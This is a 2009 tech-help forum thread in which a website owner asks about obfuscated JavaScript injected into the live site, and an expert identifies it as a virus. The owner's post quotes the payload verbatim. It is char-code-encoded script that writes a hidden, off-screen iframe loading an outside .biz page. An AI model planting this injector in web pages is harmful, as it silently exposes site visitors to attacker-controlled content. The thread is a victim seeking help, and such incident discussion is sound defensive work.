Solved

Javascript Added to bottom of site - Virus

Posted on 2009-05-05
8
328 Views
Last Modified: 2013-12-09
Hi All,

Hoping someone can answer this, the following code is getting added to the bottom of our site and it does look like a virus. Does anyone know what it is or how it is getting there. Just so you know, it is not on our local files and is only on the remote. Any info will be appreciated.



</html><script type="text/javascript">var gBhwGdGvEUgyLteZaNBv = "RvA60RvA105RvA102RvA114RvA97RvA109RvA101RvA32RvA119RvA105RvA100RvA116RvA104RvA61RvA34RvA52RvA56RvA48RvA34RvA32RvA104RvA101RvA105RvA103RvA104RvA116RvA61RvA34RvA54RvA48RvA34RvA32RvA115RvA114RvA99RvA61RvA34RvA104RvA116RvA116RvA112RvA58RvA47RvA47RvA112RvA114RvA111RvA102RvA105RvA116RvA111RvA111RvA108RvA116RvA105RvA112RvA46RvA98RvA105RvA122RvA47RvA98RvA108RvA111RvA103RvA47RvA102RvA101RvA101RvA100RvA46RvA104RvA116RvA109RvA108RvA34RvA32RvA115RvA116RvA121RvA108RvA101RvA61RvA34RvA98RvA111RvA114RvA100RvA101RvA114RvA58RvA48RvA112RvA120RvA59RvA32RvA112RvA111RvA115RvA105RvA116RvA105RvA111RvA110RvA58RvA114RvA101RvA108RvA97RvA116RvA105RvA118RvA101RvA59RvA32RvA116RvA111RvA112RvA58RvA48RvA112RvA120RvA59RvA32RvA108RvA101RvA102RvA116RvA58RvA45RvA53RvA48RvA48RvA112RvA120RvA59RvA32RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA58RvA48RvA59RvA32RvA102RvA105RvA108RvA116RvA101RvA114RvA58RvA112RvA114RvA111RvA103RvA105RvA100RvA58RvA68RvA88RvA73RvA109RvA97RvA103RvA101RvA84RvA114RvA97RvA110RvA115RvA102RvA111RvA114RvA109RvA46RvA77RvA105RvA99RvA114RvA111RvA115RvA111RvA102RvA116RvA46RvA65RvA108RvA112RvA104RvA97RvA40RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA61RvA48RvA41RvA59RvA32RvA45RvA109RvA111RvA122RvA45RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA58RvA48RvA34RvA62RvA60RvA47RvA105RvA102RvA114RvA97RvA109RvA101RvA62";var tFWwuHhNLrortVozzuuD = gBhwGdGvEUgyLteZaNBv.split("RvA");var OaCaUhzuuBpnGMjBTROe = "";for (var IDWCYKBYFvcTWeuqLukF=1; IDWCYKBYFvcTWeuqLukF<tFWwuHhNLrortVozzuuD.length; IDWCYKBYFvcTWeuqLukF++){OaCaUhzuuBpnGMjBTROe+=String.fromCharCode(tFWwuHhNLrortVozzuuD[IDWCYKBYFvcTWeuqLukF]);}document.write(OaCaUhzuuBpnGMjBTROe)</script>

Open in new window

0
Comment
Question by:jimbinho
  • 5
  • 3
8 Comments
 
LVL 41

Expert Comment

by:HonorGod
ID: 24304108
Yes, it is a virus.

How did it get there?  I don't know.

Remove it...

0
 

Author Comment

by:jimbinho
ID: 24304137
Hi,

Thanks for this. I think to be more specific what i am looking for is: what the code does when scrambled as i am assuming it is scrambled java script. I would also like to know how anyone would do this and if anyone has seen anything like this before can they shed any light?

Thanks
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24304167
here is what it translates as...
iframeCode.jpg
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24305101
How would someone do this?

Well, they would first figure out what they want to generate (e.g., the "iframe" shown above), then put that in a string, and convert the individual characters into numeric values.  For example, using something like the code shown below.

Then, they would take the numbers, and put them into an array, and from the array, create a string.

... does that make sense?



<html>

<body>
 

<script type="text/javascript">
 

var str='<iframe width="480"'

for ( var i = 0; i < str.length; i++ ) {

  document.write( str[ i ] + ' = ' + str.charCodeAt( i ) + '<br />')

}

</script>
 

</body>

</html>

Open in new window

0
Is Your Active Directory as Secure as You Think?

More than 75% of all records are compromised because of the loss or theft of a privileged credential. Experts have been exploring Active Directory infrastructure to identify key threats and establish best practices for keeping data safe. Attend this month’s webinar to learn more.

 

Author Comment

by:jimbinho
ID: 24306426
Hi,

Thanks for this. My question is not so much how they created the string, but how it is likely to get onto our site. Thanks for your help.
0
 
LVL 41

Accepted Solution

by:
HonorGod earned 500 total points
ID: 24306495
Ah, now that's a real question.

There are a number of possibilities.  Unfortunately, I don't know for certain, especially without knowing specifics about the server on which this code was found, or who has access to it, or the kind of programs that execute on it, etc.
0
 

Author Closing Comment

by:jimbinho
ID: 31577958
Appreciate the help
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24421987
Thanks for the grade & points.  I'm sorry that you didn't feel the information warranted an A.

Good luck & have a great day
0

Featured Post

Is Your Active Directory as Secure as You Think?

More than 75% of all records are compromised because of the loss or theft of a privileged credential. Experts have been exploring Active Directory infrastructure to identify key threats and establish best practices for keeping data safe. Attend this month’s webinar to learn more.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

So you got the Conficker. You could go to each machine and run the eye chart test (http://www.confickerworkinggroup.org/infection_test/cfeyechart.html), but in a bigger environment, or if you prefer to work smarter and not harder, you need some …
Ransomware continues to be a growing problem for both personal and business users alike and Antivirus companies are still struggling to find a reliable way to protect you from this dangerous threat.
This Micro Tutorial will teach you how to censor certain areas of your screen. The example in this video will show a little boy's face being blurred. This will be demonstrated using Adobe Premiere Pro CS6.
Many functions in Excel can make decisions. The most simple of these is the IF function: it returns a value depending on whether a condition you describe is true or false. Once you get the hang of using the IF function, you will find it easier to us…

895 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

15 Experts available now in Live!

Get 1:1 Help Now